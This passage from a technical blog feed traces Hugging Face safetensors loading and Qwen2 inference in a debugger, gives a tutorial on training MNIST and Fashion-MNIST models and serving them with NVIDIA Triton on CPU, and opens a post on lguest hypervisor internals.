def inspect_safetensors(file_path):
with safe_open(file_path, framework="pt", device="cpu") as f:
for key in f.keys():
# load the tensor directly (memory efficient; only metadata is loaded)
tensor = f.get_tensor(key)
# read its attributes
dtype = tensor.dtype
shape = tensor.shape
print(f"Tensor Name: {key}, Data Type (dtype): {dtype}, Shape: {tuple(shape)}")
inspect_safetensors("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B\\model.safetensors")
</code></pre></div></div>
<p><img src="/assets/img/llminference/9.png" alt="" /></p>
<p>So the content of a safetensors file is just the values of the tensors. The core of inference is loading these values into memory or GPU memory, running the input tensor through the neural network, and finally obtaining an output tensor.</p>
<h2> How the safetensors file is loaded into the model </h2>
<p>First, look at the model structure via print(model). We can see that DeepSeek-R1-Distill-Qwen-1.5B has a vocab size of 151936 and an embedding size of 1536.</p>
<p><img src="/assets/img/llminference/10.png" alt="" /></p>
<p>Loading the model means loading the weights from the safetensors files into the structure above. PyTorch provides methods to save and load model weights: saving serializes the model's parameters as a dict called the state_dict, and loading puts that state_dict back into the model, ultimately through nn.Module.load_state_dict. This section traces the path from the initial AutoModelForCausalLM.from_pretrained down to that final nn.Module.load_state_dict call.</p>
<p>Single-stepping into AutoModelForCausalLM.from_pretrained lands in _BaseAutoModelClass.from_pretrained. At the end of that function it finds the model_class and calls its from_pretrained; the debug screenshot below shows that the model_class is Qwen2ForCausalLM.</p>
<p>However, stepping into that call takes us to PreTrainedModel.from_pretrained, which means Qwen2ForCausalLM inherits from_pretrained from PreTrainedModel.</p>
<p><img src="/assets/img/llminference/11.png" alt="" /></p>
<p>Continuing on in this function, we reach cls._load_pretrained_model; _load_pretrained_model is likewise defined on PreTrainedModel.</p>
<p>Early on, _load_pretrained_model calls load_state_dict to load the weights from the safetensors file.</p>
<p><img src="/assets/img/llminference/12.png" alt="" /></p>
<p>Setting a breakpoint at the return of load_state_dict, we can see that all tensors from the model file have been loaded into the state_dict.</p>
<p><img src="/assets/img/llminference/13.png" alt="" /></p>
<p>OK, at this point we have the file's state_dict; next it gets loaded into the model. The code first makes some adjustments to the keys, which we will skip for now. Continuing to single-step through _load_pretrained_model, we reach the call to _load_state_dict_into_meta_model.</p>
<p>From its call site, _load_state_dict_into_meta_model is evidently where the parameters are put into the model.</p>
<p><img src="/assets/img/llminference/14.png" alt="" /></p>
<p>_load_state_dict_into_meta_model loops over the keys and values of the state_dict, for example the first parameter 'lm_head.weight'.</p>
<p><img src="/assets/img/llminference/15.png" alt="" /></p>
<p>Debugging further, we reach _load_parameter_into_model. Its arguments are the model, the param_name, and the concrete param, so this should be where the parameter is loaded into the model. Sure enough, it first obtains the module, an nn.Module, and then calls its load_state_dict member function.</p>
<p><img src="/assets/img/llminference/16.png" alt="" /></p>
<p>Let's briefly look at how get_module_from_name works. The leading part of the name is the submodule path.</p>
<p><img src="/assets/img/llminference/17.png" alt="" /></p>
<p>From Module.get_submodule we can see it returns a Linear module; this is lm_head.</p>
<p><img src="/assets/img/llminference/18.png" alt="" /></p>
<p>With the whole process above, we have connected AutoModelForCausalLM.from_pretrained to the nn.Module.load_state_dict call.
The process, simplified:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AutoModelForCausalLM.from_pretrained
->_BaseAutoModelClass.from_pretrained
->PreTrainedModel.from_pretrained
->PreTrainedModel._load_pretrained_model
->load_state_dict (load the weights from safetensors)
->_load_state_dict_into_meta_model
->_load_parameter_into_model
->get_module_from_name (get the nn.Module)
->module.load_state_dict (call nn.Module.load_state_dict)
</code></pre></div></div>
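<p>The get_module_from_name step, which splits a dotted name such as 'lm_head.weight' into a submodule path plus a parameter name, can be mimicked with a small pure-Python sketch. The Module class below is a toy stand-in for illustration, not the real nn.Module API.</p>

```python
class Module:
    # minimal stand-in for nn.Module: named children plus its own parameters
    def __init__(self, **children):
        self.children = children
        self.params = {}

def get_module_from_name(root, full_name):
    # 'a.b.weight' -> walk children a, then b; return (owning module, 'weight')
    *path, param_name = full_name.split(".")
    module = root
    for part in path:
        module = module.children[part]
    return module, param_name

lm_head = Module()
model = Module(lm_head=lm_head)

mod, pname = get_module_from_name(model, "lm_head.weight")
mod.params[pname] = [0.1, 0.2]   # "load" the tensor into the module
assert mod is lm_head and pname == "weight"
print(lm_head.params)            # {'weight': [0.1, 0.2]}
```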
<h2> The overall inference process </h2>
<p>After the loop in _load_state_dict_into_meta_model, the weights from the safetensors file are all loaded into the model. The next step is to analyze how the input is forwarded through the model.</p>
<p>First, the tokenizer.</p>
<p><img src="/assets/img/llminference/19.png" alt="" /></p>
<p>The corresponding meanings can be found in the model's tokenizer.json.</p>
<p><img src="/assets/img/llminference/20.png" alt="" /></p>
<p><img src="/assets/img/llminference/21.png" alt="" /></p>
<p>Continuing to single-step through one forward pass of the model, we actually land in Qwen2Model.forward.</p>
<p><img src="/assets/img/llminference/22.png" alt="" /></p>
<p>It first calls self.embed_tokens to embed the tokenized sequence, as the screenshot below shows.
After embedding, inputs_embeds.shape is [1, 5, 1536]: 1 is the batch_size, 5 is the sequence length (the number of tokens), and 1536 is the embedding dimension.</p>
<p><img src="/assets/img/llminference/23.png" alt="" /></p>
<p>Next comes position embedding, which adds positional information to the sequence.</p>
<p><img src="/assets/img/llminference/24.png" alt="" /></p>
<p>Then a for loop runs through the hidden layers (this model has 28 of them), calling decoder_layer each iteration and feeding the previous layer's output (layer_outputs[0]) as the next layer's input (hidden_states).</p>
<p><img src="/assets/img/llminference/25.png" alt="" /></p>
<p>Stepping into decoder_layer, we arrive at Qwen2DecoderLayer.forward. This is the core of the transformer: the norm layers, the self-attention layer, the residual connections, and the final fully connected layer.</p>
<p><img src="/assets/img/llminference/26.png" alt="" /></p>
<p>Essentially this just multiplies the incoming hidden_states by the parameters we loaded into the model earlier, producing the outputs.</p>
<p>Let's take a brief look at the self-attention layer. In my admittedly shallow understanding, self-attention transforms the input sequence's embeddings so that each transformed embedding carries information from the other tokens in the same sequence. In code, that means taking a hidden_states input, internally computing the Q/K/V matrices, and producing a hidden_states output of the same shape.</p>
<p>Self-attention is implemented by Qwen2Attention.
On entry, the hidden_states parameter holds the token embeddings; Q, K, and V are computed next.</p>
<p><img src="/assets/img/llminference/27.png" alt="" /></p>
<p>It then calls attention_interface to compute self-attention; here that function is sdpa_attention_forward.</p>
<p><img src="/assets/img/llminference/28.png" alt="" /></p>
<p>sdpa_attention_forward performs multi-head self-attention, 12 heads in total, each using 128 of the embedding dimensions. Here we also meet the famous scaled_dot_product_attention.</p>
<p><img src="/assets/img/llminference/29.png" alt="" /></p>
<p>After sdpa_attention_forward completes, attn_output.shape is [1, 5, 12, 128]: batch_size 1, sequence length 5, 12 heads, and head dim 128.</p>
<p>Back in Qwen2Attention.forward, after the multi-head attention the heads are merged and then multiplied by o_proj.</p>
<p><img src="/assets/img/llminference/30.png" alt="" /></p>
<p>Back in Qwen2DecoderLayer.forward, after the self-attention computation self.self_attn comes the fully connected layer.</p>
<p><img src="/assets/img/llminference/31.png" alt="" /></p>
<p>At heart it is still matrix multiplication; the final output is produced, with the new hidden_states placed in outputs[0].</p>
<p>Finally, back in Qwen2Model.forward, one decoder layer computation is complete. After 28 such decoder passes, Qwen2Model.forward reaches its last step, BaseModelOutputWithPast; stepping through it eventually brings us to Qwen2ForCausalLM.forward.</p>
<p>In Qwen2ForCausalLM.forward, the hidden states pass through the lm_head Linear layer, finally producing logits of size 151936.</p>
<p><img src="/assets/img/llminference/32.png" alt="" /></p>
<p>Qwen2ForCausalLM.forward ultimately returns a CausalLMOutputWithPast object, as follows:</p>
<p><img src="/assets/img/llminference/33.png" alt="" /></p>
<h2> Summary </h2>
<p>This post is a record of debugging and analyzing the inference process while learning. Through it we got an end-to-end picture of the inference flow. In essence, an inference framework optimizes this process to make prediction as fast as possible.</p>
Deploy a 'hello world' model serving using triton server without GPU2025-04-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/04/05/triton1
<p>The first example is reproduced and modified from <a href="https://zhuanlan.zhihu.com/p/21172600328">here</a>; it uses the fashion MNIST dataset.</p>
<p>The second is my own; it uses the MNIST dataset.</p>
<h2> Deploy a fashion-mnist model serving </h2>
<h3> train the model </h3>
<p>This train uses CPU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # python train.py --epoch 60
import argparse
import time
import torch
import torchvision
from torch import nn
##device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = torch.device('cpu')
# load the data
def load_data_fashion_mnist(batch_size, resize=None, root='data'):
"""Download the fashion mnist dataset and then load into memory."""
trans = []
if resize:
trans.append(torchvision.transforms.Resize(size=resize))
trans.append(torchvision.transforms.ToTensor())
# image transforms
transform = torchvision.transforms.Compose(trans)
mnist_train = torchvision.datasets.FashionMNIST(root=root, train=True, download=True, transform=transform)
mnist_test = torchvision.datasets.FashionMNIST(root=root, train=False, download=True, transform=transform)
train_iter = torch.utils.data.DataLoader(mnist_train, batch_size=batch_size, shuffle=True)
test_iter = torch.utils.data.DataLoader(mnist_test, batch_size=batch_size, shuffle=False)
return train_iter, test_iter
class GlobalAvgPool2d(nn.Module):
# global average pooling: set the pooling window to the input's height and width
def __init__(self):
super(GlobalAvgPool2d, self).__init__()
def forward(self, x):
return nn.functional.avg_pool2d(x, kernel_size=x.size()[2:])
class FlattenLayer(nn.Module): # flatten
def forward(self, x):
return x.view(x.shape[0], -1)
# define the model structure
def model(show_shape=False) -> nn.modules.Sequential:
# torch.nn.Sequential is a Sequential container; modules are added in the order passed to the constructor.
model = nn.Sequential()
model.add_module('convd1', nn.Sequential(
nn.Conv2d(1, 25, kernel_size=3),
nn.BatchNorm2d(25),
nn.ReLU(),
))
model.add_module('maxpool1', nn.Sequential(
nn.MaxPool2d(kernel_size=2, stride=2)
))
model.add_module('convd2', nn.Sequential(
nn.Conv2d(25, 50, kernel_size=3),
nn.BatchNorm2d(50),
nn.ReLU(),
))
model.add_module('maxpool2', nn.Sequential(
nn.MaxPool2d(kernel_size=2, stride=2)
))
model.add_module('fc', nn.Sequential(
FlattenLayer(),
nn.Linear(50*5*5, 1024),
nn.ReLU(),
nn.Linear(1024, 128),
nn.ReLU(),
nn.Linear(128, 10),
))
if show_shape:
print(model)
print('shape of a 1*1*28*28 input after each module')
X = torch.rand((1, 1, 28, 28))
for name, layer in model.named_children():
X = layer(X)
print(name, ' output shape:\t', X.shape)
return model
# evaluation function
def evaluate_accuracy(data_iter, net, device=torch.device('cpu')):
"""Evaluate accuracy of a model on the given data set."""
acc_sum, n = torch.tensor([0], dtype=torch.float32, device=device), 0
for X, y in data_iter:
# If device is the GPU, copy the data to the GPU.
X, y = X.to(device), y.to(device)
net.eval()
with torch.no_grad():
y = y.long()
# [[0.2 ,0.4 ,0.5 ,0.6 ,0.8] ,[ 0.1,0.2 ,0.4 ,0.3 ,0.1]] => [ 4 , 2 ]
acc_sum += torch.sum((torch.argmax(net(X), dim=1) == y))
n += y.shape[0]
return acc_sum.item() / n
# training entry point
def train_ch(net, model_path, train_iter, test_iter, criterion, num_epochs, device, lr=None):
"""Train and evaluate a model with CPU or GPU."""
print('training on', device)
net.to(device)
optimizer = torch.optim.SGD(net.parameters(), lr=lr, momentum=0.9, weight_decay=5e-4) # optimizer
best_test_acc = 0
for epoch in range(num_epochs):
train_l_sum = torch.tensor([0.0], dtype=torch.float32, device=device)
train_acc_sum = torch.tensor([0.0], dtype=torch.float32, device=device)
n, start = 0, time.time()
for X, y in train_iter:
net.train()
optimizer.zero_grad() # reset gradients
X, y = X.to(device), y.to(device)
y_hat = net(X)
loss = criterion(y_hat, y)
loss.backward()
optimizer.step()
with torch.no_grad():
y = y.long()
train_l_sum += loss.float()
train_acc_sum += (torch.sum((torch.argmax(y_hat, dim=1) == y))).float()
n += y.shape[0]
test_acc = evaluate_accuracy(test_iter, net, device) # evaluate on the test set
print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec'
% (epoch + 1, train_l_sum / n, train_acc_sum / n, test_acc, time.time() - start))
if test_acc > best_test_acc:
print('find best! save at %s' % model_path)
best_test_acc = test_acc
# normally the model would be saved like this:
# torch.save(net, model_path)
# in this experiment we save the model as TorchScript
traced_script = torch.jit.script(net)
traced_script.save(model_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='minist',description='training script')
parser.add_argument('--device', type=str, default='cpu')
parser.add_argument('--lr', type=float, default=0.0001)
parser.add_argument('--epoch', type=int, default=1)
parser.add_argument('--batch', type=int, default=256)
parser.add_argument('--model_path', type=str, default='model.pt')
args = parser.parse_args()
lr, num_epochs = args.lr, args.epoch
device = args.device
batch = args.batch
path = args.model_path
criterion = nn.CrossEntropyLoss()
train_iter, test_iter = load_data_fashion_mnist(batch)
net = model()
train_ch(net, path, train_iter, test_iter, criterion, num_epochs, device, lr)
</code></pre></div></div>
<h3> deploy in triton server </h3>
<h4> prepare triton model file </h4>
<p>We need to prepare a directory for the triton server.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> model_repository/
-- model_pt
| -- 1/
| | -- model.pt
| -- config.pbtxt
</code></pre></div></div>
<p>The ‘model.pt’ is the file we saved in the training phase. The ‘config.pbtxt’ is as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> name: "model_pt" # 模型名,也是目录名
platform: "pytorch_libtorch" # 模型对应的平台,本次使用的是torch,不同格式的对应的平台可以在官方文档找到
#backend: "torch" # 此次 backend 和上面的 platform,至少写一个,用途一致tensorrt/onnxruntime/pytorch/tensorflow
input [
{
name: "input0" # input name
data_type: TYPE_FP32 # data type; torch.long corresponds to int64, and the mapping between tensor types and triton types is in the official docs
dims: [ -1, 1, 28, 28 ] # -1 means a variable dimension
}
]
output [
{
name: "output0" # output name
data_type: TYPE_FP32
dims: [ -1, 10 ]
}
]
instance_group [
{
kind: KIND_CPU # run on CPU
}
]
</code></pre></div></div>
<p>The ‘dims’ entries in ‘input’ and ‘output’ are the dimensions of the input and output tensors.</p>
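<p>The -1 wildcard in dims can be checked with a few lines of Python. shape_matches below is a hypothetical helper written for illustration, not part of the Triton client libraries:</p>

```python
def shape_matches(dims, shape):
    # Triton-style check: -1 in the config matches any size at that position
    return len(dims) == len(shape) and all(
        d == -1 or d == s for d, s in zip(dims, shape))

dims = [-1, 1, 28, 28]                          # from config.pbtxt above
assert shape_matches(dims, [1, 1, 28, 28])      # a single image
assert shape_matches(dims, [128, 1, 28, 28])    # a batch of 128
assert not shape_matches(dims, [1, 3, 28, 28])  # wrong channel count
print("ok")
```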
<h4> start triton server </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # step 1: download tritonserver
docker pull ngc.nju.edu.cn/nvidia/tritonserver:24.12-py3
# step 2: create model repository
mkdir model_repository
# step 3: prepare file
cd model_repository
mkdir 1
cp ~/model.pt 1/
cp ~/config.pbtxt .
# step 4: run triton server
docker run --name tritonserver --rm -it -p 8000:8000 -p 8002:8002 -v $PWD/model_repository:/models ngc.nju.edu.cn/nvidia/tritonserver:24.12-py3 bash
tritonserver --model-repository=/models
</code></pre></div></div>
<p>If the triton server starts successfully, we will see the following output.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> I0405 11:46:43.713902 379 grpc_server.cc:2558] "Started GRPCInferenceService at 0.0.0.0:8001"
I0405 11:46:43.714439 379 http_server.cc:4725] "Started HTTPService at 0.0.0.0:8000"
I0405 11:46:43.756857 379 http_server.cc:358] "Started Metrics Service at 0.0.0.0:8002"
</code></pre></div></div>
<h3> send request to triton server </h3>
<h4> calculate the accuracy </h4>
<p>Just as in the original post, we create a script to calculate the accuracy.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> import time
import torch
import torchvision
import requests
# omitted; same as above
def load_data_fashion_mnist(batch_size, resize=None, root='data'):
trans = []
if resize:
trans.append(torchvision.transforms.Resize(size=resize))
trans.append(torchvision.transforms.ToTensor())
# image transforms
transform = torchvision.transforms.Compose(trans)
mnist_train = torchvision.datasets.FashionMNIST(root=root, train=True, download=True, transform=transform)
mnist_test = torchvision.datasets.FashionMNIST(root=root, train=False, download=True, transform=transform)
train_iter = torch.utils.data.DataLoader(mnist_train, batch_size=batch_size, shuffle=True)
test_iter = torch.utils.data.DataLoader(mnist_test, batch_size=batch_size, shuffle=False)
return train_iter, test_iter
device = torch.device('cpu')
triton_host = 'http://192.168.0.118:8000/v2/models/model_pt/versions/1/infer'
def infer(imgs: torch.Tensor):
data = imgs.tolist()
request_data = {
"inputs": [{
"name": "input0",
"shape": [len(data), 1, 28, 28],
"datatype": "FP32",
"data": data,
}],
"outputs": [{
"name": "output0",
}]
}
res = requests.post(url=triton_host,json=request_data).json()
output_data = res['outputs'][0]['data']
n = 10
# group sublists into a 2D array
result = [output_data[i:i+n] for i in range(0, len(output_data), n)]
return torch.tensor(result, device='cpu')
# test the model
correct = 0
total = 0
_, test_iter = load_data_fashion_mnist(128)
start_time = time.time()
with torch.no_grad():
for imgs, labels in test_iter:
# move the input data to the right device
imgs, labels = imgs.to(device), labels.to(device)
outputs = infer(imgs)
_, predicted = torch.max(outputs, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
end_time = time.time()
# print the accuracy
accuracy = 100 * correct / total
print(f'total: {total:d} accuracy: {accuracy:.2f}%')
print(f"elapsed: {(end_time - start_time):.2f}s")
</code></pre></div></div>
<p><img src="/assets/img/triton1/1.png" alt="" /></p>
<h4> classify one picture </h4>
<p>First, convert the ubyte files to images.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> import os
from skimage import io
import torchvision
import torchvision.datasets.mnist as mnist
root="fashion_mnist"
train_set = (
mnist.read_image_file(os.path.join(root, 'train-images-idx3-ubyte')),
mnist.read_label_file(os.path.join(root, 'train-labels-idx1-ubyte'))
)
test_set = (
mnist.read_image_file(os.path.join(root, 't10k-images-idx3-ubyte')),
mnist.read_label_file(os.path.join(root, 't10k-labels-idx1-ubyte'))
)
print("training set :",train_set[0].size())
print("test set :",test_set[0].size())
def convert_to_path(name):
# lowercase the name and replace special characters with path-safe ones
return name.lower().replace('/', '_').replace(' ', '_')
# original label mapping
label_mapping = {
0: 'T-shirt/top',
1: 'Trouser',
2: 'Pullover',
3: 'Dress',
4: 'Coat',
5: 'Sandal',
6: 'Shirt',
7: 'Sneaker',
8: 'Bag',
9: 'Ankle boot'
}
# build the path-safe mapping
path_safe_mapping = {key: convert_to_path(value) for key, value in label_mapping.items()}
def convert_to_img(train=True):
if(train):
f=open(root+'train.txt','w')
data_path=root+'/train/'
if(not os.path.exists(data_path)):
os.makedirs(data_path)
for i, (img,label) in enumerate(zip(train_set[0],train_set[1])):
img_path=data_path+path_safe_mapping[int(label)] +"_"+str(i)+'.jpg'
io.imsave(img_path,img.numpy())
f.write(img_path+' '+str(label)+'\n')
f.close()
else:
f = open(root + 'test.txt', 'w')
data_path = root + '/test/'
if (not os.path.exists(data_path)):
os.makedirs(data_path)
for i, (img,label) in enumerate(zip(test_set[0],test_set[1])):
img_path = data_path+ path_safe_mapping[int(label)] +"_"+str(i) + '.jpg'
io.imsave(img_path, img.numpy())
f.write(img_path + ' ' + str(label) + '\n')
f.close()
convert_to_img(True)
convert_to_img(False)
</code></pre></div></div>
<p>Randomly choose some pictures.</p>
<p><img src="/assets/img/triton1/2.png" alt="" /></p>
<p>Use the following code to send one picture to the triton server to infer its class.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> import time
import torch
import torchvision
import requests
from PIL import Image
from torch import nn,save,load
from torch.optim import Adam
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
import sys
triton_host = 'http://192.168.0.118:8000/v2/models/model_pt/versions/1/infer'
def infer(imgs: torch.Tensor):
data = imgs.tolist()
request_data = {
"inputs": [{
"name": "input0",
"shape": [len(data), 1, 28, 28],
"datatype": "FP32",
"data": data,
}],
"outputs": [{
"name": "output0",
}]
}
res = requests.post(url=triton_host,json=request_data).json()
output_data = res['outputs'][0]['data']
n = 10
# group sublists into a 2D array
result = [output_data[i:i+n] for i in range(0, len(output_data), n)]
return torch.tensor(result, device='cpu')
def convert_to_path(name):
# lowercase the name and replace special characters with path-safe ones
return name.lower().replace('/', '_').replace(' ', '_')
# original label mapping
label_mapping = {
0: 'T-shirt/top',
1: 'Trouser',
2: 'Pullover',
3: 'Dress',
4: 'Coat',
5: 'Sandal',
6: 'Shirt',
7: 'Sneaker',
8: 'Bag',
9: 'Ankle boot'
}
# build the path-safe mapping
path_safe_mapping = {key: convert_to_path(value) for key, value in label_mapping.items()}
img = Image.open(sys.argv[1])
img_transform = transforms.Compose([transforms.ToTensor()])
img_tensor = img_transform(img).unsqueeze(0).to('cpu')
print (img_tensor.shape)
output = infer(img_tensor)
print(output)
predicted_label = torch.argmax(output)
print(f"Predicted label: {path_safe_mapping[int(predicted_label)]}")
</code></pre></div></div>
<p>As we can see, the predictions for ‘ankle_boot’ and ‘sneaker’ are right, but ‘coat’ is wrong.</p>
<p><img src="/assets/img/triton1/3.png" alt="" /></p>
<h2> Deploy a mnist model serving </h2>
<h3> train the model </h3>
<p>I used <a href="https://github.com/RafayKhattak/Digit-Classification-Pytorch/blob/main/DigitClassificationPytorch.ipynb">this code</a> for the training phase.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> import torch
from torch import nn,save,load
from torch.optim import Adam
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
transform = transforms.Compose([transforms.ToTensor()])
train_dataset = datasets.MNIST(root="data", download=True, train=True, transform=transform)
train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)
class ImageClassifier(nn.Module):
def __init__(self):
super(ImageClassifier, self).__init__()
self.conv_layers = nn.Sequential(
nn.Conv2d(1, 32, kernel_size=3),
nn.ReLU(),
nn.Conv2d(32, 64, kernel_size=3),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3),
nn.ReLU()
)
self.fc_layers = nn.Sequential(
nn.Flatten(),
nn.Linear(64 * 22 * 22, 10)
)
def forward(self, x):
x = self.conv_layers(x)
x = self.fc_layers(x)
return x
device = torch.device("cpu")
classifier = ImageClassifier().to('cpu')
optimizer = Adam(classifier.parameters(), lr=0.001)
loss_fn = nn.CrossEntropyLoss()
for epoch in range(10): # Train for 10 epochs
for images, labels in train_loader:
images, labels = images.to(device), labels.to(device)
optimizer.zero_grad() # Reset gradients
outputs = classifier(images) # Forward pass
loss = loss_fn(outputs, labels) # Compute loss
loss.backward() # Backward pass
optimizer.step() # Update weights
print(f"Epoch:{epoch} loss is {loss.item()}")
traced_script = torch.jit.script(classifier)
traced_script.save("model_state.pt")
</code></pre></div></div>
<h3> deploy in triton server </h3>
<p>Create a ‘model_mnist’ directory in ‘model_repository’ and create ‘1’ directory in ‘model_mnist’.</p>
<p><img src="/assets/img/triton1/4.png" alt="" /></p>
<p>The ‘config.pbtxt’ is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name: "model_mnist" # model name, also the directory name
platform: "pytorch_libtorch" # the platform for the model; this one uses torch, and the platform for each format is listed in the official docs
#backend: "torch" # at least one of backend and the platform above must be set; they serve the same purpose (tensorrt/onnxruntime/pytorch/tensorflow)
input [
{
name: "input0" # input name
data_type: TYPE_FP32 # data type; the mapping between tensor types and triton types is in the official docs
dims: [1, 1, 28, 28 ] # fixed dimensions this time
}
]
output [
{
name: "output0" # output name
data_type: TYPE_FP32
dims: [1, 10 ]
}
]
instance_group [
{
kind: KIND_CPU # run on CPU
}
]
</code></pre></div></div>
<p>Then start the triton server.</p>
<h3> send request to triton server </h3>
<p>First, convert the ubyte files to images.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
import numpy as np
import struct
from PIL import Image
import os
data_file = 't10k-images-idx3-ubyte' # change this path as needed
# It's 7840016B, but we should set to 7840000B
data_file_size = 7840016
data_file_size = str(data_file_size - 16) + 'B'
data_buf = open(data_file, 'rb').read()
magic, numImages, numRows, numColumns = struct.unpack_from(
'>IIII', data_buf, 0)
datas = struct.unpack_from(
'>' + data_file_size, data_buf, struct.calcsize('>IIII'))
datas = np.array(datas).astype(np.uint8).reshape(
numImages, 1, numRows, numColumns)
label_file = 't10k-labels-idx1-ubyte' # change this path as needed
# It's 10008B, but we should set to 10000B
label_file_size = 10008
label_file_size = str(label_file_size - 8) + 'B'
label_buf = open(label_file, 'rb').read()
magic, numLabels = struct.unpack_from('>II', label_buf, 0)
labels = struct.unpack_from(
'>' + label_file_size, label_buf, struct.calcsize('>II'))
labels = np.array(labels).astype(np.int64)
datas_root = 'mnist_test' # change this path as needed
if not os.path.exists(datas_root):
os.mkdir(datas_root)
for i in range(10):
file_name = datas_root + os.sep + str(i)
if not os.path.exists(file_name):
os.mkdir(file_name)
for ii in range(numLabels):
img = Image.fromarray(datas[ii, 0, 0:28, 0:28])
label = labels[ii]
file_name = datas_root + os.sep + str(label) + os.sep + \
'mnist_test_' + str(label) + "_"+str(ii) + '.png'
img.save(file_name)
</code></pre></div></div>
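<p>The hard-coded 7840016 and 10008 byte counts in the script above come from the IDX header: the image file starts with four big-endian u32 fields (magic, count, rows, cols), the label file with two. The sizes can be derived instead of hard-coded, as in this small sketch (it parses synthetic header bytes, not the real files):</p>

```python
import struct

def parse_idx_image_header(buf):
    # images file: magic 0x00000803, then count, rows, cols (big-endian u32)
    magic, n, rows, cols = struct.unpack_from(">IIII", buf, 0)
    assert magic == 0x803, "not an IDX3 image file"
    return n, rows, cols, struct.calcsize(">IIII")

# build a fake t10k-style header: 10000 images of 28x28
fake = struct.pack(">IIII", 0x803, 10000, 28, 28) + b"\x00" * 4
n, rows, cols, offset = parse_idx_image_header(fake)
print(n, rows, cols, offset)     # 10000 28 28 16
print(offset + n * rows * cols)  # 7840016, matching the hard-coded size
```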
<p>Use the following code to send one picture to the triton server.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
import time
import torch
import torchvision
import requests
from PIL import Image
from torch import nn,save,load
from torch.optim import Adam
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
import sys
device = torch.device('cpu')
triton_host = 'http://192.168.0.118:8000/v2/models/model_mnist/versions/1/infer'
def infer(imgs: torch.Tensor):
data = imgs.tolist()
request_data = {
"inputs": [{
"name": "input0",
"shape": [1, 1, 28, 28],
"datatype": "FP32",
"data": data,
}],
"outputs": [{
"name": "output0",
}]
}
res = requests.post(url=triton_host,json=request_data).json()
print(res)
output_data = res['outputs'][0]['data']
n = 10
# group sublists into a 2D array
result = [output_data[i:i+n] for i in range(0, len(output_data), n)]
return torch.tensor(result, device='cpu')
img = Image.open(sys.argv[1])
img_transform = transforms.Compose([transforms.ToTensor()])
img_tensor = img_transform(img).unsqueeze(0).to('cpu')
print (img_tensor.shape)
output = infer(img_tensor)
print(output)
predicted_label = torch.argmax(output)
print(f"Predicted label: {predicted_label}")
</code></pre></div></div>
<p>As we can see, all predictions are right.</p>
<p><img src="/assets/img/triton1/5.png" alt="" /></p>
<p><img src="/assets/img/triton1/6.png" alt="" /></p>
<h2> Ref </h2>
<ol>
<li><a href="https://zhuanlan.zhihu.com/p/21172600328">使用 triton 部署模型</a></li>
<li><a href="https://github.com/RafayKhattak/Digit-Classification-Pytorch/tree/main">Digit-Classification-Pytorch</a></li>
<li><a href="https://github.com/zheng0115/DeepLearning_Notes_CV/blob/master/other/MNIST/MNIST%E6%95%B0%E6%8D%AE%E9%9B%86%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A0%BC%E5%BC%8F%E8%BD%AC%E6%8D%A2%E4%B8%BA%E5%9B%BE%E7%89%87.md">MNIST数据集二进制格式转换为图片.md</a></li>
<li><a href="https://www.cnblogs.com/denny402/p/7520063.html">pytorch: 准备、训练和测试自己的图片数据</a></li>
<li><a href="https://github.com/niyazed/triton-mnist-example/tree/master">triton-mnist-example</a></li>
</ol>
lguest internals2025-03-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/03/01/lguest-internals
<p>lguest is the simplest x86 virtualization solution. It is a paravirtualized hypervisor. In this post I will dive deep into the internals of lguest.</p>
<h2> Related files </h2>
<p>tools/lguest/lguest.c, lguest userspace tool just like QEMU.</p>
<p>drivers/lguest/core.c, the core code of lguest hypervisor, including the module initialization.</p>
<p>drivers/lguest/hypercalls.c, hypercall related handler.</p>
<p>drivers/lguest/interrupts_and_traps.c, guest interrupt code.</p>
<p>drivers/lguest/lguest_user.c, the /dev/lguest devices related code to interact with the userspace tool.</p>
<p>drivers/lguest/page_table.c, mostly the shadow page table management.</p>
<p>drivers/lguest/segments.c, the guest idt/gdt related code.</p>
<p>drivers/lguest/x86/core.c, the x86 arch code: register setup and the entry to the switcher.</p>
<p>drivers/lguest/x86/switcher_32.S, switcher code.</p>
<p>drivers/lguest is just like kvm code in kernel.</p>
<p>arch/x86/lguest is the guest code.</p>
<p>arch/x86/lguest/boot.c, lguest guest related code, like subarch init, pv ops.</p>
<p>arch/x86/lguest/head_32.S, the assembly code of lguest guest.</p>
<h2> lguest architecture overview </h2>
<p>Following pic shows the architecture of lguest. It contains three key components: the guest, the switcher and the lg.ko.</p>
<p><img src="/assets/img/lguestinternals/1.png" alt="" /></p>
<p>The guest kernel runs on hardware ring 1 and the guest userspace runs on hardware ring 3.
The switcher switches worlds between the host, guest user, and guest kernel. World switches can be triggered by a set of events such as interrupts and exceptions. The switcher comprises efficient, concise assembly code mapped to an identical address within both the host and guest kernel address spaces.
